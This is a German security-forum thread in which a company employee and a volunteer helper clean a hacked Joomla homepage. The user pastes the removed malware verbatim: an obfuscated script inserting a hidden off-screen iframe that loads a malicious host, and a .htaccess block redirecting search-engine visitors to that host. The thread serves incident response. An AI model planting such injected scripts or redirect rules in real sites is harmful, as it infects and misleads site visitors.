Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 08.01.2013, 14:34   #1
comtom123
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hallo,

beim Aufruf unserer Firmen-Homepage meldet Kaspersky die Fehlermeldung:

Kaspersky
Anti-Virus 6.0 für Windows Workstation
Der Zugriff wurde verweigert
Der Zugriff auf die angeforderte URL-Adresse ist nicht möglich

Beim Zugriff auf die URL-Adresse:

hxxp://www.globalsped.de/

sind folgende Fehler aufgetreten:

Das angeforderte Objekt ist mit folgenden Viren INFIZIERT: Trojan-Downloader.JS.Iframe.czd


Bitte wenden Sie sich an Ihren Provider, wenn Sie diese Meldung für einen Irrtum halten.
Diese Meldung wurde erstellt:
08.01.2013 15:27:28
Kaspersky Anti-Virus 6.0 für Windows Workstation


und lässt keinen auf die Seite.
Ich habe die Homepage leider nicht programmiert und diejenige Person ist nicht mehr erreichbar, jedoch habe ich Zugang zu Strato und FTP-Server.

Könnt Ihr mir bitte helfen, wie ich den Trojaner loswerde?

Danke,

Alt 08.01.2013, 14:44   #2
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hi
Gibts noch weitere Details, kaspersky zeigt manchmal noch an, welches Objekt betroffen ist. sehe mir die seite mal an
__________________

__________________

Alt 08.01.2013, 15:01   #3
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Ah, hab das schätzchin schon, durchsuche mal deine index.php bzw html in einem editor nach einem iframe und lösche das, wenn du dir das nicht selbst zutraust, kann ich das für dich tun
__________________
__________________

Alt 08.01.2013, 15:02   #4
comtom123
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hallo,
habe mir den ganzen Webspace per FTP runtergezogen.
Kaspersky hat die Datei gefunden ( Documentation.html ) und gleich entfernt.
Ich lade die Dateien gerade ohne dieser Datei rauf, mal schauen obs dann funktioniert.
Meldung von Kaspersky rechts unten in der Taskleiste:

Das Öffnen des schädlichen HTTP-Objekts <hxxp://www.globalsped.de/>: gefunden: trojanisches Programm 'Trojan-Downloader.JS.Iframe.czd'.

Danke,

EDIT: UUUPS ich war zu langsam mit lesen und schreiben ...
Ich hab mir die index angeschaut, kann aber nix finden.
Wäre super wenn du dir das mal anscahuen kannst ...

Geändert von comtom123 (08.01.2013 um 15:07 Uhr) Grund: Nachtrag

Alt 08.01.2013, 15:06   #5
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Wie gesagt, grad gesehen, durchsuche deine index dateien und gucke nach einem iframe was auf
heartofpole.net
leitet.
mit dem Löschen ists eh noch nicht getan, der Hack war durch Sicherheitslücken möglich, die du schließen musst

__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 08.01.2013, 15:47   #6
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hi
noch zufällig irgendwo ein Backup deiner Seite?
__________________
--> Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage

Alt 08.01.2013, 16:17   #7
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Da sind noch einige mehr betroffen, das kann n bissel dauern, nimm die seite mal so lange offline, damit sich keiner mit dem Rootkit infiziert, welches ihr verteilt
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 08.01.2013, 16:40   #8
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



in den folgenen dateien suche nach:
_q[_n]('src' ...
Nicht die volle Zeile abgetippt.

cgi-data\general.tpl
neu\überwachung.html
neu\cache\index.html
neu\components\index.html
neu\images\index.html
neu\includes\index.html
neu\language\index.html
neu\libraries\index.html
neu\logs\index.html
neu\media\index.html
neu\modules\index.html
neu\plugins\index.html
neu\templates\index.html
neu\tmp\index.html
phpMyAdmin\Documentation.html

bitte alle diese Dateien bearbeiten, neu hochladen, und dann gucken wir mal.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 09.01.2013, 07:14   #9
comtom123
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hallo und guten morgen,

habe die Seite kurz umgeleitet auf 2012, wo eine neue Homepage erstellt werden soll. Aber es soll noch die alte so lange laufen, bis die neue endgültig fertig ist.
Ich kann Dateien nicht runterladen, Kaspersky löscht diese gleich ...
Wie meinst du mit bearbeiten? Was soll ich mit der Zeile "_q[_n]('src' ..." machen?
Danke,

NACHTRAG: Am besten wäre es wenn die Joomla Version unter dem Ordner /neu wieder laufen würde.
Das war die "beste" Homepage ...

Hallo,
habe jetzt bei diesen genannten Dateien folgende Zeilen gelöscht und wieder hochgeladen:

<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'hxxp://heartofpole.net/xml.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);
</script>

cgi-data\general.tpl war unter /cgi-data/global/general.tpl

und mit neu\überwachung.html meintest du wohl bewachung.htm ?

Habe die Domain www.globalsped.de jetzt auf /neu umgeleitet (dort wo ich das Script entfernt habe). Jetzt wird man auf google.de umgeleitet wenn man die Seite aufruft.

Danke für die Hilfe ...

Nochwas: Die Seite ist mit Joomla! gebaut worden, man kommt aucht nicht mehr ins backend: GLOBALSPED - Administration

Wenn das alles wieder funzt, ist euch eine Spende gewiss ...
Danke,

GLOBALSPED - Administration

Alt 09.01.2013, 14:11   #10
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



hi
so, seite geht ja schon mal wieder. ich komm drauf.
bitte mal die neueste joomla version einspielen:

Joomla.de || Home || Übersicht
Download Joomla
aktuell ist 2.5
wir können uns dann noch an die sichere Konfiguration machen.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 09.01.2013, 15:06   #11
comtom123
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hallo,

aktuell ist Joomla! Version 1.5.23 drauf.
Funktioniert mit einem update dann auch wieder alles so?
Das Template und so weiter?

Wenn ich ins Administrator-Menü will, kommt immer noch die Meldung beim Kaspersky.

globalsped . de / administrator (ohne Leerzeichen vor und nach / und . )

Danke,

Nachtrag: Ach ja, die Rechte habe ich auch neu vergben für ALLE Dateien bei FTP: Ordner: 755, Dateien: 644

Alt 09.01.2013, 15:09   #12
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



steht da bei kaspersky auch die genaue datei? schau mal ob unter administrator auch ne index.html ist und gucke dann ob da die von mir genannte zeile drinnen ist.
Bevor du das update einspielst, mach halt nen Backup vorher.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 07.02.2013, 14:55   #13
comtom123
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hallo,
hatte leider keine Zeit und war auch im Urlaub.

Ich dachte das Problem hat sich erledigt, was wohl doch nicht der Fall war, wie mich ein Kunde darauf hingewiesen hat.

Folgendes habe ich gemacht:
Die neuste Joomla! - Version draufgespielt
Jetzt geht das Admin-Menü wieder.

Aber wenn man bei google nach Globalsped sucht und das Ergebnis anklickt landet man entweder auf einer Seite für polnische leichtbekleidete Frauen (heart of Pole - oder so ähnlich) oder auf einer neuen google Seite ohne Suchbegriff. Das gleiche passiert auch wenn man beim Browser www.globalsped.de eingibt.
Allerdings wenn mann hxxp://globalsped.de eingibt landet man auf der richtigen Seite.
Ich kann den Fehler leider nicht finden und bitte euch das mal kurz anzuschauen.
@markusg: der FTP Zugang funktioniert wieder den ich dir geschickt habe

Danke nochmals,

Alt 07.02.2013, 20:10   #14
markusg
/// Malware-holic
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



hi
probleme erledigen sich nicht einfach von selbst...
und du musst halt auch deine Firmenpage schützen, mit updates etc, du hast ne Verantwortung den Kunden gegenüber und das beginnt auch meiner Sicht dann schon bei dem Update Stand der Homepage.
schau mal in die htaccess datei ob da merkwürdige umleitungen drinnen stehen, oder sende die mir mal, den Zugang hab ich nicht mehr gespeichert. :-)
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 08.02.2013, 07:37   #15
comtom123
 
Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Standard

Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage



Hallo,
in der .htaccess ist ein merkwürdiger Eintrag.
Kann ich das entfernen?

Ich habe mittlerweile die .htaccess durch eine leere .htaccess hochgeladen.

Hier der Inhalt der "verseuchten":
_________

#c3284d#
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|at search|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confe x|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google |goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|livein ternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|pas sagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmasch ine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ hxxp://heartofpole.net/xml.php [R=301,L]

</IfModule>
#/c3284d#


#######################################################################
# Diese .htaccess wurde vom STRATO-Webservermanager erstellt #
#######################################################################

Options -Indexes

AddType application/x-httpd-php5 .php .php3 .php4 .php5
____________________________

Mittlerweile leitet die Seite nur noch auf google.de um (wenn man bei google nach globalsped sucht und auf das ergebnis klickt bzw. man www.globalsped.de im Browser eingibt.
Wenn man im Suchergebnis auf eine "Unterseite" klickt landet man auf der Seite, ebenso wenn man hxxp://globalsped.de im Browser eingibt. Woran kann das noch liegen?

Danke

Antwort

Themen zu Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage
aufruf, erreichbar, erstell, erstellt, fehlermeldung, folge, folgende, folgenden, infiziert, kaspersky, melde, meldet, nicht mehr, objekt, person, programmier, provider, strato, troja, trojaner, viren, windows, works, zugang, zugriff



Ähnliche Themen: Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage


  1. JS/Agent.NKW Trojaner auf unserer Homepage
    Plagegeister aller Art und deren Bekämpfung - 30.07.2014 (12)
  2. Trojaner auf Webseite / Trojan-Downloader.JS.Iframe.dfe
    Plagegeister aller Art und deren Bekämpfung - 10.10.2013 (3)
  3. trojan-downloader.js.iframe.deb auf Website
    Plagegeister aller Art und deren Bekämpfung - 09.06.2013 (9)
  4. JS:Trojan.JS.Iframe.DH (Virus)
    Log-Analyse und Auswertung - 05.05.2013 (34)
  5. Fund: Trojan:JS/iframe.BT
    Log-Analyse und Auswertung - 28.01.2013 (15)
  6. JS/TrojanDownloader.Iframe.NKE trojan
    Log-Analyse und Auswertung - 23.10.2012 (15)
  7. Trojan.JS.Iframe.BY auf PC gefunden
    Plagegeister aller Art und deren Bekämpfung - 22.10.2012 (28)
  8. JS/TrojanDownloader.Iframe.NKE trojan/HTML/Fraud.BG trojan
    Log-Analyse und Auswertung - 30.09.2012 (3)
  9. Malware IFrame auf meiner Homepage
    Plagegeister aller Art und deren Bekämpfung - 11.07.2012 (1)
  10. Trojan.JS.Iframe.BDJ
    Plagegeister aller Art und deren Bekämpfung - 14.04.2012 (5)
  11. Trojan-Downloader.JS.Iframe.cqj
    Plagegeister aller Art und deren Bekämpfung - 20.12.2011 (0)
  12. Trojan.Iframe.SL auf Homepage - Fragen über Fragen
    Plagegeister aller Art und deren Bekämpfung - 19.12.2011 (11)
  13. Trojan-Downloader.JS.Iframe.bcl auf Homepage
    Plagegeister aller Art und deren Bekämpfung - 29.09.2009 (1)
  14. Trojan-Downloader.JS.Iframe.bhy
    Plagegeister aller Art und deren Bekämpfung - 03.07.2009 (4)
  15. IFrame Trojan
    Mülltonne - 05.11.2008 (0)
  16. auf meiner Hp: Trojan-Downloader.HTML.IFrame.ds...und was nun??
    Plagegeister aller Art und deren Bekämpfung - 12.05.2008 (12)
  17. HILFEEEE!!!trojan-downloader-ruin, trojan-downloader-wareout
    Log-Analyse und Auswertung - 16.09.2005 (1)

Zum Thema Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage - Hallo, beim Aufruf unserer Firmen-Homepage meldet Kaspersky die Fehlermeldung: Kaspersky Anti-Virus 6.0 für Windows Workstation Der Zugriff wurde verweigert Der Zugriff auf die angeforderte URL-Adresse ist nicht möglich Beim Zugriff - Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage...
Archiv
Du betrachtest: Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.